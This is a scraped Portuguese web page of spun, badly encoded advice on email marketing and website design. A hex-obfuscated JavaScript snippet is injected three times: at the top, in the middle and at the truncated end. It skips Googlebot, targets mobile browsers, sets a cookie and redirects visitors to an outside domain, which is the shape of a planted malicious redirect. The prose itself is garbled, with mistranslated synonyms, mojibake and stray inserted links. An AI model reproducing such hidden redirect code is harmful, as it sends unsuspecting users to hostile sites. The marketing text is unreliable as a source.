var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l tais como projetar 1 site funcional – parte 2 Post: formato, espaA�os e cores

Qual A� linksa.co.za este maior erro que os indA�viduos cometem em suas campanhas de email marketing? NA?o A� uma estratA�gia ruim – ainda que a mA? estratA�gia seja um fator importante para arruinar qualquer potencial de lucro de que um site, produto ou ideia possa ter. E nA?o, nA?o A� falta de leads – obter sua lista A� surpreendentemente fA?cil, uma vez que vocA? sabe o sinal certo para fazA?-lo. Este maior erro que as pessoas cometem foi o seguinte: elas assumem que este e-mail marketing deve ser deixado a cargo dos especialistas e nA?o se preocupe em aprender nada a respeito de isso!

Gente, eu nA?o estou brincando sobre isso. HA? toneladas e toneladas de sitios por aA� com planos de negA?cios perfeitamente rentA?veis que estA?o perdendo ouro puro, ignorando suas anuncios de marketing por e-mail. E nA?o, o envio de boletins informativos mensais sobre atualizaA�A�es no sitio nA?o constitui um e-mail marketing. E-mail marketing A� especialmente um desenvolvimento de geraA�A?o de negA?cios atravA�s da manutenA�A?o por uma lista de contatos de e-mail – vizinhos que se inscrevem na sua lista por 1 motivo ou outro (geralmente para adquirir acesso a informaA�A�es ou a algum outro recurso). Uma campanha executada corretamente envolve pelo menos o seguinte: * CriaA�A?o de um relacionamento positivo e responsivo usando sua lista. * Prover sua lista com uma razA?o para confiar em vocA? e em seu conselho (dA? informaA�A�es de qualidade primeiro, peA�a o numerA?rio deles muito mais tarde). * Promover produtos direcionados e A?teis para sua lista (relacionados (direta ou indiretamente) com a razA?o pela qual eles se inscreveram em sua lista.

O visitante verA? nessa lista de pontos de que o chocho envio de ofertas promocionais para muitos endereA�os do e-mail nA?o se qualifica como e-mail marketing. NA?o. Isso A� spam. NA?o seja saiba como a maioria das pessoas na Internet. Se vocA? permanecequeda operando em um nicho on-line, A� especialmente quase garantido que vocA? esteja sentado em uma pequena mina de ouro. Tire proveito disso por todos os meios possA�veis e faA�a este esforA�o para criar sua prA?pria prA?pria campanha de marketing por e-mail.

As ferramentas.

Para configurar sua campanha de marketing por e-mail, vocA? precisa do seguinte:

* 1 autoresponder confiA?vel.

* Um formulA?rio por captura de chumbo / pA?gina de destino.

* Significa trazer trA?fego para essa pA?gina de fatalidade. * 1 conjunto de mensagens prA�-escritas para sua prA?pria lista.

* Um programa de marketing por email.

Se isso parece em demasia, nA?o se preocupe. Todos os 5 pontos sA?o explicados detalhadamente abaixo.

Este autoresponder 1 autoresponder A� especialmente a ferramenta mais poderosa no seu arsenal de e-mail marketing. Essencialmente, ele nA?o apenas automatiza o gerenciamento de listas (incluindo solicitaA�A�es de assinatura e cancelamento de assinatura), mas tambA�m igualmente similarmente identicamente conjuntamente pode automatizar o processo de envio de e-mails para sua prA?pria lista. O visitante pode carregar um conjunto de e-mails / mensagens para sua lista no seu autoresponder, e o script enviarA? estes e-mails automaticamente nas datas que o visitante especificar. Os dois autoresponders que eu recomendaria sA?o AWeber e GetResponse. Ambos tA?m preA�os razoA?veis e espetaculares caracterA�sticas. Eu pessoalmente uso o Aweber, embora se vocA? quiser testar autoresponders e olhar como eles funcionam eu sugiro de que vocA? se inscreva para a versA?o gratuita do GetResponse e experimente lA? primeiro. Configurando um autoresponder A� bastante simples. Tanto o AWeber quanto este GetResponse tA?m um procedimento simples do inscriA�A?o e, quando vocA? entra, eles fornecem tutoriais detalhados para ajudA?-lo a configurar seu processo de gerenciamento de listas.

Mensagens prA�-escritas O gerenciamento de listas A� deveras simples usando autoresponders. O visitante pode prA�-carregar sua conta com respostas de modelo para qualquer uma das seguintes ocasiA�es: * Quando alguA�m se inscrever por meio por um formulA?rio de captura de leads. * Quando alguA�m confirma sua inscriA�A?o na sua prA?pria lista. * Quando alguA�m cancelar a assinatura da sua lista. * Quando alguA�m envia um email para o seu endereA�o de email do autoresponder (pode configurar esta recado para dizer ao remetente que irA? responder dentro de 1 determinado perA�odo de tempo ou redirecionA?-lo para 1 endereA�o de email diferente). AlA�m disso, vocA? tA?m a possibilidade de escrever muitos e-mails usando antecedA?ncia (no caso por vocA? querer enviar mensagens para seus assinantes em datas especA�ficas no futuro) e carregA?-los em seu autoresponder. Em seguida, basta especificar as datas nas quais vocA? deseja que cada mensagem mesmo que enviada e seu trabalho estA? concluA�do. O autoresponder cuida por todo o resto. O prA�-carregamento de mensagens em seu autoresponder A� especialmente uma A?tima maneira por agendar 1 curso do email informativo ou se vocA? quiser enviar muitos emails promocionais para o mesmo resultado. A maioria dos autoresponders (incluindo AWeber e GetResponse) oferecem modelos para mensagens genA�ricas (como a lista acima), tornando seu trabalho demasiado mais simples. Tudo o que vocA? realmente precisa A� personalizar esses modelos, se preciso, e depois carregar as suas prA?prias mensagens.

Landing Page

Muita gente simplesmente usam uma inscriA�A?o para o nosso boletim informativo? tipo de caixa em as suas pA?ginas principais e esperamos que os indA�viduos entrem na loja. NA?o A� assim que funciona. Para as pessoas se inscreverem na sua lista, elas devem estar interessadas no de que vocA? tem a dizer. Isso significa que primeiro vocA? possui que educar seus assinantes em potencial para o que eles tA?m a ganhar entregando seus endereA�os de e-mail para vocA?. Configure uma pA?gina separada em seu website como uma pA?gina por destino. Nesta pA?gina, vocA? incluiria uma descriA�A?o do seu boletim informativo, natural como os principais pontos positivos para seus assinantes se inscreverem pelo boletim informativo (um relatA?rio gratuito sobre atualizaA�A�es semanais, ou dicas de namoro regulares, ou qualquer de que seja o seu nicho). A chave aqui A� especialmente convencer o leitor de que, se eles estiverem interessados em seu campo, A� uma vantagem para eles assinarem o boletim informativo, pois A� este lugar fantA?stico para obter as mais proveitosos informaA�A�es a respeito de esse campo. E, claro, fornecer um formulA?rio simples para estes visitantes preencherem e se inscreverem no seu boletim informativo.

Direcionar trA?fego

AtA� actualmente, vocA? estA? pronto para construir sua lista e aumentar as vendas atravA�s de seu autoresponder. Contudo primeiro, vocA? precisa direcionar o trA?fego (leia pessoas reais) para sua pA?gina de fatalidade para que eles possam se inscrever em sua prA?pria lista. Aprecie uma breve discussA?o do algumas tA?ticas que vocA? pode utilizar:

* Escrever e enviar artigos em um diretA?rio do post de nicho.

Certifique-se de incluir sua caixa do recurso no fim do post, com 1 texto descrevendo seu curso por e-mail e 1 link voltando para sua prA?pria pA?gina do destino. Isso A� deveras elementar, porA�m ainda foi surpreendente saiba como poucas pessoas acabam aproveitando-se disso, com a certeza de que o visitante se concentra nos principais sites ricos em conteA?do do seu nicho ao enviar esses artigos.

* Se vocA? espera lucrar significativamente com seus assinantes (na prA?xima liA�A?o, tais como vocA? pode calcular o valor da vida eficiente do seu assinante), vocA? pode gastar algum numerA?rio na criaA�A?o de sua lista.

Use o Google AdWords ou o Yahoo Search Marketing para direcionar o trA?fego segmentado para sua pA?gina de fatalidade. A chave aqui A� fazer lances em frases muito especA�ficas de duas e 3 palavras, para que nA?o apenas seu trA?fego seja segmentado, mas tambA�m que vocA? possa obter esses cliques usando a certeza de nA?o pagar um preA�o inconveniente por clique ( 1 visitante), caso contrA?rio, este processo tA?m a possibilidade de sair atravA�s culatra em vocA?.

* Simples como parece, certifique-se de promover o seu boletim informativo em seu site. NA?o se limite a escolher um link em todas as pA?ginas – inclua destemido texto e realmente explique em poucas palavras este que o boletim informativo oferece (como um anA?ncio de PPC).

* Propor um brinde – isso pode ser uma ferramenta gratuita ou acesso a uma divisA?o do seu site (onde vocA? guarda o porreiro conteA?do) ou atA� exatamente um relatA?rio para download. Este A� especialmente de longe o ainda mais comum de que os profissionais de marketing usam para construir sua prA?pria lista.

* Se vocA? tiver um discurso do vendas em seu site, certifique-se de que seu boletim informativo gratuito esteja em destaque nele. Ele fornecerA? aos leitores uma alternativa isenta de riscos para testA?-lo e descobrir se vocA? realmente pode vir a cumprir qualquer reivindicaA�A?o feita no discurso de vendas. AlA�m disso, muitas pessoas nA?o compram imediatamente – elas tendem a avaliar os prA?s e contras e deliberar em muito sobre as decisA�es de compra (especialmente decisA�es de compra caras). Ao propor a eles a opA�A?o de se inscrever no seu boletim informativo, vocA? garante uma trilha interna para a compra ou nA?o de debate em suas mentes e estA? em posiA�A?o por ganhar sua prA?pria confianA�a e ganhar seu dinheiro.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

l como projetar 1 site funcional – parte 2 Post: formato, espaA�os e cores

A net A� claramente adequada para a apresentaA�A?o de papelada curtos, contendo muitos hyperlinks. No caso de um texto comprido, nA?o substituirA? um livro ou uma revista (pelo menos no momento). Ainda assim, se houver necessidade por fazer upload de material mais longo, ele deverA? ser dividido em numerosas partes e a versA?o para impressA?o ou download deverA? ser disponibilizada sob a forma de arquivos HTML ou RTF. 1o de tudo, o texto deve ser lA?cido. Por meio de parA?grafos curtos, diferentes estilos (nA�veis) de tA�tulos e listas numeradas, podemos melhorar a legibilidade do texto. Palavras importantes devem ser destacadas em negrito ou em itA?lico e, ao mesmo tempo, sublinhado deve ser evitado, pois foi reservado para links. O texto deverA? estA?tico, embora possamos encontrar pA?ginas da web com mensagens curtas na forma do faixa de rolagem. Excepcionalmente, um post em movimento A� lido mais tardiamente. Nesse caso, o retorno A�s informaA�A�es selecionadas tambA�m A� prejudicado. VocA? deve esperar atA� que as informaA�A�es restantes tenham passado. A forma tais como os parA?grafos sA?o ajustados tambA�m influencia o ritmo da leitura. Sugere-se alinhar A� esquerda ou justificar, porque este texto formatado de tal maneira lA? muito mais facilmente. Este texto nA?o deve ser exibido em toda a largura da tela. Muitas vezes, permite o leitor omitir linhas ou descer uma linha abaixo. Linhas contendo no mA?ximo 10 palavras sA?o as mais fA?ceis do ler. A cor do texto deve contrastar com a cor do programa de fundo. Um texto preto contra um fundo branco A� o mais legA�vel. A combinaA�A?o inversa tambA�m A� especialmente boa, no entanto, no caso de textos mais longos, desencoraja o usuA?rio e diminui este ritmo da leitura. O emprego de cores brilhantes foi muito cansativo para estes olhos. De fato, ainda que de chamarem nossa atenA�A?o, desestimulam apA?s um curto perA�odo do tempo. O plano por fundo deve ser simples, visto que os grA?ficos dificultam a distinA�A?o das linhas de caracteres e formas das palavras. No entanto, se decidirmos usar 1 padrA?o, ele deve ser muito sutil. Pelo caso do tA�tulos do seA�A�es, temos que impedir cores. O texto colorido A� reservado para referA?ncias. O usuA?rio nA?o lA? um sitio linha por linha, porA�m sim passa por ele. Por isso, o conteA?do do site deve ser dividido em vA?rias partes, cada uma das quais deve receber um tA�tulo. Vale a pena criar alguns espaA�os vazios entre blocos por texto. Um documento dividido em partes A� lido mais simplesmente do que um texto escrito sem espaA�os. As A?nicas desvantagens dessa soluA�A?o sA?o a extensA?o do artigo e ter que sua rolagem contA�nua. Nesses casos, recomenda-se colocar uma referA?ncia que permita voltar a tela.

SeleA�A?o adequada de fontes

A�s vezes, hA? discussA�es sobre a seleA�A?o por tipos do fonte por conta da divisA?o em fontes nenhumas serifas (por exemplo, Verdana) e serif (por exemplo, Times New Roman). A� especialmente comumente entendido que os indA�viduos preferem ler textos escritos por meio de fontes serif. Isso resulta do fato que as serifas facilitam a movimentaA�A?o do um personagem para outro, o de que aumenta sua legibilidade. Este princA�pio, ainda assim, aplica-se a documentos em papel. A baixa definiA�A?o torna as fontes com serifa dificilmente legA�veis na tela. A� especialmente especialmente do grande influA?ncia no caso de textos escritos por meio de fontes pequenas. Juntamente com o crescente nA?mero por usuA?rios de que possuem monitores de elevada definiA�A?o, esse princA�pio terA? menos importA?ncia. No entanto, por enquanto, fontes sans-serif sA?o mais preferA�veis. Certamente, este tamanho da fonte possui um impacto na legibilidade. Fonte tamanho pelo menos 10 pontos deve ser usado para este texto bA?sico. A� especialmente importante evitar letras maiA?sculas no texto. POST ESCRITO NESSE FORMA Foi LIDO EM CERCA DE 10% MAIS TARDIAMENTE. NA?o apenas dois estilos de fonte (para textos de documentos e tA�tulos) ou 3 no caso de textos especiais, por ex. cA?digo do plano, deve ser utilizado.

GrA?ficos, ilustraA�A�es e animaA�A�es

Os grA?ficos, assim como estes multimA�dia, devem ser colocados nos sites quando eles realmente permitem que o usuA?rio entenda melhor as informaA�A�es apresentadas ou melhoram as qualidades estA�ticas da pA?gina da web. Estes objetivos do projeto grA?fico sA?o informar, facilitar a movimentaA�A?o do recursos, contudo nA?o absorver atenA�A?o. Se nA?s utilizar grA?ficos, em vez por muitas fotos, podemos usar um numerosas vezes. NA?o sA? irA? acelerar este carregamento da pA?gina, mas tambA�m garantirA? a coesA?o visual do site. Para fazer upload de uma imagem, devemos nos lembrar de adicionar o atributo ALT, de que permitirA? ao usuA?rio olhar o de que uma determinada imagem apresenta antes de ser exibida. AlA�m disso, navegadores para cegos podem ver arquivos ALT em voz alta. Imagens de suplementos alimentares desempenham 1 papel vital no processo de consumida de decisA?o sobre sua prA?pria compra. Estes usuA?rios de que visitam lojas on-line estA?o mais dispostos a aguardar por muito mais alguns segundos para ver como A� especialmente o produto em que estA?o interessados. No entanto, este princA�pio por um nA?mero limitado por imagens e ilustraA�A�es deve ser aplicado em pA?ginas de nA�vel superior. No sitio que apresenta um produto, alA�m da descriA�A?o do resultado, devemos criar o upload de uma pequena foto (leia-se: “light”) ou uma referA?ncia a uma pA?gina que apresenta seu formato maior ou fotografias adicionais na forma de uma galeria. Todos os tipos por esquemas, diagramas e grA?ficos constituem outros elementos grA?ficos, que facilitam a compreensA?o e assimilaA�A?o do conteA?do da pA?gina, e que sA?o preferidos pelos usuA?rios por causa dessas qualidades. Estes A�cones tambA�m sA?o em muito usados. No entanto, devemos lembrar que a aparA?ncia deles nem sempre pode ser interpretada de forma idA?ntica e vale a pena descrevA?-los de modo a nA?o induzir em erro este destinatA?rio. Ainda mais, nA?o A� especialmente aconselhA?vel utilizar o menu grA?fico e os botA�es. Prolonga este carregamento da pA?gina e, alA�m disso, causa problemas adicionais, p. quando outra categoria do menu A� especialmente adicionada derivado A? reestruturaA�A?o do site. Em seguida, o webmaster deve entrar em contato usando o designer grA?fico que comeA�a a procurar por arquivos do origem. A situaA�A?o pode vir a se tornar mais complicada quando os grA?ficos sA?o projetados por uma pessoa de fora, que nA?o definiu diretrizes para este design de elementos grA?ficos. As animaA�A�es constituem outra forma comumente usada, cujo objetivo foi chamar a atenA�A?o do usuA?rio. Ainda assim, eles devem ser utilizados raramente, como A� complicado se concentrar em um texto usando muitos sinais em movimento. Se vocA? puder responder afirmativamente a questA?o por saber se A� permitido expressar sua prA?pria mensagem isento animaA�A?o, entA?o vocA? deve renunciar aos grA?ficos animados. Se tem que manter-se presente na pA?gina web, nA?o deve ser muito intoleravel. Ele incomoda o usuA?rio e dificulta o foco na parcela principal da pA?gina. A� especialmente por isso de que, apA?s diversas repetiA�A�es, deve parar.

A pA?gina principal

A� uma vitrine do site, quando um usuA?rio precisa descobrir uma resposta para as seguintes perguntas: “Que espA�cie de informaA�A?o A� apresentada no site? “, “Que conteA?do ela oferece? ” A� assim sendo que, alA�m do nome e logotipo de destaque da companhia, deve atalhar o catA?logo de seA�A�es, um breve resumo das principais informaA�A�es, bem do tipo mA?dulo do pesquisa. TambA�m igualmente similarmente identicamente conjuntamente constitui um bom lugar para informar sobre promoA�A�es, no entanto, eles nA?o devem ocupar demasiado espaA�o. Sua principal funA�A?o deve ser familiarizar o usuA?rio com sua A?rea de assunto, incentivA?-lo a entrar em outras pA?ginas da Web, porA�m antes de mais nada, para possibilitar uma pesquisa adicional por meio do um sistema de navegaA�A?o simples e intuitivo.

NA?o apenas 1 projeto

A� especialmente impossA�vel discutir todos estes princA�pios por funcionalidade do site em um artigo. A� por isso que vale a pena se familiarizar com outras publicaA�A�es elaborando sobre o assunto. Muitas vezes, acontece de que a aplicaA�A?o de praticamente as regras ao mesmo tempo nA?o A� viA?vel, especialmente ao projetar sites muito complicados. Em tais casos, A� especialmente necessA?rio renunciar a certos princA�pios. Elementos nA?o diretamente relacionados com o design da pA?gina da web, por exemplo sentido de tela, tamanho por fonte definido pelo usuA?rio ou 1 navegador usado, tambA�m tA?m um impacto phinvestsolution.000webhostapp.com na funcionalidade. O site deve ser testado antes de ser publicado na Internet. A conclusA?o e implementaA�A?o do projeto nA?o significa de que podemos ignorar a funcionalidade. Um bom criador deve monitorar suas pA?ginas da Web a esse respeito o tempo todo.

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v 